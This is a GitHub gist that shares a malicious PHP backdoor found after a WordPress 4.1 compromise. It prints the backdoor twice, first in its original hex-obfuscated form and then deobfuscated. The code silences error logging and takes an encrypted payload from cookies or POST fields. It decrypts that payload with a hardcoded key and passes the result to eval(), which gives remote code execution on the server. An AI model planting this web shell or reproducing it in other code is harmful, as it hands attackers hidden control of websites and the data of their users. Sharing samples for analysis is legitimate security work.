Skip to content

Instantly share code, notes, and snippets.

@loretoparisi

loretoparisi/render.php

Last active February 25, 2016 23:59
Show Gist options
  • Save loretoparisi/ed698c751e1d9265db7e to your computer and use it in GitHub Desktop.
Save loretoparisi/ed698c751e1d9265db7e to your computer and use it in GitHub Desktop.
Download ZIP
Malicious PHP file from Wordpress 4.1 attack
Raw
render.php
<?php ${"G\x4cO\x42\x41\x4c\x53"}["\x78\x77\x79\x75\x72s\x67\x6b"]="\x76a\x6c\x75\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["d\x65\x72\x6b\x73\x74\x76"]="o\x75t\x5f\x64a\x74\x61";${"\x47L\x4f\x42AL\x53"}["\x6al\x79\x78\x79\x6ad\x64e\x78\x6f"]="\x6b\x65y";${"\x47\x4c\x4f\x42\x41L\x53"}["\x64\x70\x64km\x63gv\x76"]="\x6a";${"GL\x4f\x42AL\x53"}["\x6d\x77\x62\x79\x7a\x79\x62u\x6a"]="\x69";${"\x47L\x4fBA\x4cS"}["s\x6az\x66\x69sei\x74\x75"]="\x64\x61\x74\x61\x5f\x6be\x79";${"G\x4c\x4f\x42A\x4c\x53"}["\x6d\x65d\x69\x64m\x70\x6eo\x73"]="\x64\x61\x74\x61";@ini_set("\x65\x72r\x6f\x72_l\x6f\x67",NULL);$qtbsgvf="d\x61\x74\x61";@ini_set("l\x6f\x67\x5f\x65rror\x73",0);@ini_set("\x6da\x78_exe\x63utio\x6e\x5f\x74\x69m\x65",0);@set_time_limit(0);$mtbxmnj="d\x61\x74\x61\x5f\x6be\x79";if(!defined("P\x48P_\x45\x4f\x4c")){define("\x50H\x50\x5fE\x4fL","\n");}if(!defined("\x44IR\x45C\x54\x4fRY\x5fSEPA\x52A\x54O\x52")){define("\x44I\x52E\x43TOR\x59\x5f\x53E\x50A\x52\x41T\x4fR","/");}${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6d\x65d\x69d\x6d\x70\x6eo\x73"]}=NULL;${${"GLO\x42\x41\x4c\x53"}["sj\x7a\x66i\x73\x65i\x74\x75"]}=NULL;$GLOBALS["auth"]="\x34\x65\x66\x363a\x62e-1\x61\x62\x64-\x345\x616-\x39\x31\x33d-\x36\x66\x62\x39\x3965\x37\x6524\x62";global$auth;$tyjmuxkjcc="\x61\x75\x74\x68";function sh_decrypt_phase($data,$key){${"G\x4cOB\x41\x4cS"}["\x69\x69\x6e\x66vn\x67\x63\x69"]="\x6f\x75t\x5f\x64\x61\x74a";${"G\x4cO\x42\x41\x4c\x53"}["\x77\x6as\x70\x6d\x6c\x6e"]="\x6fu\x74\x5f\x64at\x61";${${"\x47LOB\x41\x4cS"}["\x77j\x73\x70\x6d\x6c\x6e"]}="";${"\x47LO\x42A\x4c\x53"}["a\x6b\x78mu\x6cfj\x64\x70\x78t"]="\x69";for(${${"GL\x4f\x42AL\x53"}["\x61k\x78\x6d\x75\x6cf\x6a\x64\x70\x78t"]}=0;${${"\x47L\x4f\x42\x41\x4cS"}["\x6dwb\x79zy\x62\x75\x6a"]}<strlen(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6de\x64\x69\x64\x6d\x70\x6e\x6f\x73"]});){$udkucaxadhsu="\x6a";for(${$udkucaxadhsu}=0;${${"\x47\x4c\x4f\x42\x41L\x53"}["\x64\x70\x64\x6bmc\x67v\x76"]}<strlen(${${"G\x4c\x4f\x42A\x4c\x53"}["\x6a\x6c\x79\x78\x79\x6add\x65\x78\x6f"]})&&${${"GL\x4f\x42\x41L\x53"}["m\x77b\x79z\x79\x62\x75\x6a"]}<strlen(${${"G\x4c\x4fBAL\x53"}["\x6d\x65\x64i\x64m\x70\x6e\x6fs"]});${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x64pd\x6bm\x63g\x76v"]}++,${${"G\x4cO\x42\x41\x4c\x53"}["\x6d\x77b\x79\x7a\x79\x62\x75\x6a"]}++){$xnanwxk="\x6a";${"\x47L\x4f\x42\x41LS"}["\x6fr\x63\x66\x64\x71\x6a\x62\x63c\x6e\x71"]="\x69";${${"G\x4c\x4f\x42ALS"}["\x64\x65r\x6bstv"]}.=chr(ord(${${"\x47LO\x42\x41\x4c\x53"}["\x6dedid\x6d\x70n\x6f\x73"]}[${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6fr\x63\x66\x64\x71\x6a\x62\x63\x63\x6e\x71"]}])^ord(${${"GL\x4f\x42\x41\x4cS"}["\x6a\x6cy\x78y\x6a\x64d\x65\x78o"]}[${$xnanwxk}]));}}return${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69i\x6e\x66v\x6eg\x63i"]};}function sh_decrypt($data,$key){${"G\x4c\x4f\x42A\x4c\x53"}["\x78\x75m\x64o\x71\x76"]="\x61u\x74\x68";$xysysumkpu="\x64\x61\x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$xysysumkpu},${${"GLO\x42\x41\x4c\x53"}["x\x75m\x64o\x71\x76"]}),${${"\x47\x4c\x4f\x42A\x4c\x53"}["jly\x78\x79j\x64\x64\x65\x78\x6f"]});}foreach($_COOKIE as${${"\x47LO\x42\x41\x4c\x53"}["jl\x79\x78\x79\x6a\x64\x64\x65\x78\x6f"]}=>${${"\x47\x4cOBA\x4c\x53"}["xw\x79u\x72\x73\x67k"]}){${"\x47L\x4f\x42A\x4c\x53"}["ha\x71\x63m\x75\x67\x65\x6d"]="d\x61\x74\x61_ke\x79";$uqweheyxxqi="v\x61\x6c\x75\x65";${${"G\x4c\x4fB\x41\x4c\x53"}["\x6d\x65di\x64mpno\x73"]}=${$uqweheyxxqi};${${"\x47\x4cOBA\x4c\x53"}["\x68\x61\x71c\x6d\x75\x67\x65\x6d"]}=${${"\x47\x4cO\x42A\x4c\x53"}["j\x6c\x79\x78\x79\x6a\x64d\x65\x78\x6f"]};}if(!${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["m\x65\x64\x69d\x6d\x70n\x6f\x73"]}){${"\x47\x4c\x4fB\x41\x4c\x53"}["y\x62\x66t\x79\x68o\x7at\x76"]="val\x75\x65";foreach($_POST as${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6a\x6c\x79\x78\x79\x6a\x64\x64\x65\x78\x6f"]}=>${${"G\x4cO\x42A\x4cS"}["\x79\x62f\x74\x79\x68\x6f\x7atv"]}){${${"G\x4c\x4fB\x41L\x53"}["m\x65\x64\x69d\x6dp\x6e\x6f\x73"]}=${${"\x47LO\x42\x41\x4c\x53"}["x\x77\x79\x75\x72sg\x6b"]};${${"\x47\x4c\x4f\x42\x41L\x53"}["s\x6a\x7afis\x65it\x75"]}=${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6a\x6cy\x78\x79\x6a\x64\x64e\x78\x6f"]};}}${"GL\x4f\x42A\x4cS"}["b\x65b\x63h\x7a\x66"]="\x64\x61\x74a";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x65di\x64\x6d\x70\x6e\x6f\x73"]}=@unserialize(sh_decrypt(@base64_decode(${${"\x47\x4c\x4fBA\x4c\x53"}["\x62\x65\x62chzf"]}),${$mtbxmnj}));if(isset(${${"G\x4c\x4fB\x41LS"}["\x6de\x64\x69d\x6dp\x6e\x6f\x73"]}["ak"])&&${$tyjmuxkjcc}==${$qtbsgvf}["\x61k"]){${"\x47L\x4fBA\x4c\x53"}["f\x70\x71\x6c\x67\x6f\x79\x6e"]="d\x61t\x61";${"\x47\x4c\x4f\x42AL\x53"}["b\x71\x6b\x72\x65\x6c\x76\x6d"]="da\x74\x61";if(${${"\x47L\x4f\x42A\x4c\x53"}["\x62\x71k\x72\x65\x6c\x76\x6d"]}["a"]=="\x69"){${${"GLO\x42\x41\x4cS"}["\x6d\x77b\x79\x7a\x79buj"]}=Array("\x70v"=>@phpversion(),"sv"=>"\x31\x2e0-1",);echo@serialize(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6d\x77b\x79\x7a\x79b\x75\x6a"]});}elseif(${${"\x47L\x4f\x42\x41\x4c\x53"}["fp\x71l\x67\x6fyn"]}["a"]=="e"){$sygysdobfhgr="d\x61\x74\x61";eval(${$sygysdobfhgr}["\x64"]);}}
Raw
render_decoded.php
// unphp
// https://www.unphp.net
<?php $ {
"GLOBALS"
}
["xwyursgk"] = "value";
$ {
"GLOBALS"
}
["derkstv"] = "out_data";
$ {
"GLOBALS"
}
["jlyxyjddexo"] = "key";
$ {
"GLOBALS"
}
["dpdkmcgvv"] = "j";
$ {
"GLOBALS"
}
["mwbyzybuj"] = "i";
$ {
"GLOBALS"
}
["sjzfiseitu"] = "data_key";
$ {
"GLOBALS"
}
["medidmpnos"] = "data";
@ini_set("error_log", NULL);
$qtbsgvf = "data";
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$mtbxmnj = "data_key";
if (!defined("PHP_EOL")) {
define("PHP_EOL", "
");
}
if (!defined("DIRECTORY_SEPARATOR")) {
define("DIRECTORY_SEPARATOR", "/");
}
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = NULL;
$ {
$ {
"GLOBALS"
}
["sjzfiseitu"]
} = NULL;
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;
$tyjmuxkjcc = "auth";
function sh_decrypt_phase($data, $key) {
$ {
"GLOBALS"
}
["iinfvngci"] = "out_data";
$ {
"GLOBALS"
}
["wjspmln"] = "out_data";
$ {
$ {
"GLOBALS"
}
["wjspmln"]
} = "";
$ {
"GLOBALS"
}
["akxmulfjdpxt"] = "i";
for ($ {
$ {
"GLOBALS"
}
["akxmulfjdpxt"]
} = 0;$ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} < strlen($ {
$ {
"GLOBALS"
}
["medidmpnos"]
});) {
$udkucaxadhsu = "j";
for ($ {
$udkucaxadhsu
} = 0;$ {
$ {
"GLOBALS"
}
["dpdkmcgvv"]
} < strlen($ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
}) && $ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} < strlen($ {
$ {
"GLOBALS"
}
["medidmpnos"]
});$ {
$ {
"GLOBALS"
}
["dpdkmcgvv"]
}
++, $ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
}
++) {
$xnanwxk = "j";
$ {
"GLOBALS"
}
["orcfdqjbccnq"] = "i";
$ {
$ {
"GLOBALS"
}
["derkstv"]
}.= chr(ord($ {
$ {
"GLOBALS"
}
["medidmpnos"]
}
[$ {
$ {
"GLOBALS"
}
["orcfdqjbccnq"]
}
]) ^ ord($ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
}
[$ {
$xnanwxk
}
]));
}
}
return $ {
$ {
"GLOBALS"
}
["iinfvngci"]
};
}
function sh_decrypt($data, $key) {
$ {
"GLOBALS"
}
["xumdoqv"] = "auth";
$xysysumkpu = "data";
global $auth;
return sh_decrypt_phase(sh_decrypt_phase($ {
$xysysumkpu
}, $ {
$ {
"GLOBALS"
}
["xumdoqv"]
}), $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
});
}
foreach ($_COOKIE as $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
} => $ {
$ {
"GLOBALS"
}
["xwyursgk"]
}) {
$ {
"GLOBALS"
}
["haqcmugem"] = "data_key";
$uqweheyxxqi = "value";
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = $ {
$uqweheyxxqi
};
$ {
$ {
"GLOBALS"
}
["haqcmugem"]
} = $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
};
}
if (!$ {
$ {
"GLOBALS"
}
["medidmpnos"]
}) {
$ {
"GLOBALS"
}
["ybftyhoztv"] = "value";
foreach ($_POST as $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
} => $ {
$ {
"GLOBALS"
}
["ybftyhoztv"]
}) {
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = $ {
$ {
"GLOBALS"
}
["xwyursgk"]
};
$ {
$ {
"GLOBALS"
}
["sjzfiseitu"]
} = $ {
$ {
"GLOBALS"
}
["jlyxyjddexo"]
};
}
}
$ {
"GLOBALS"
}
["bebchzf"] = "data";
$ {
$ {
"GLOBALS"
}
["medidmpnos"]
} = @unserialize(sh_decrypt(@base64_decode($ {
$ {
"GLOBALS"
}
["bebchzf"]
}), $ {
$mtbxmnj
}));
if (isset($ {
$ {
"GLOBALS"
}
["medidmpnos"]
}
["ak"]) && $ {
$tyjmuxkjcc
} == $ {
$qtbsgvf
}
["ak"]) {
$ {
"GLOBALS"
}
["fpqlgoyn"] = "data";
$ {
"GLOBALS"
}
["bqkrelvm"] = "data";
if ($ {
$ {
"GLOBALS"
}
["bqkrelvm"]
}
["a"] == "i") {
$ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
} = Array("pv" => @phpversion(), "sv" => "1.0-1",);
echo @serialize($ {
$ {
"GLOBALS"
}
["mwbyzybuj"]
});
} elseif ($ {
$ {
"GLOBALS"
}
["fpqlgoyn"]
}
["a"] == "e") {
$sygysdobfhgr = "data";
eval($ {
$sygysdobfhgr
}
["d"]);
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment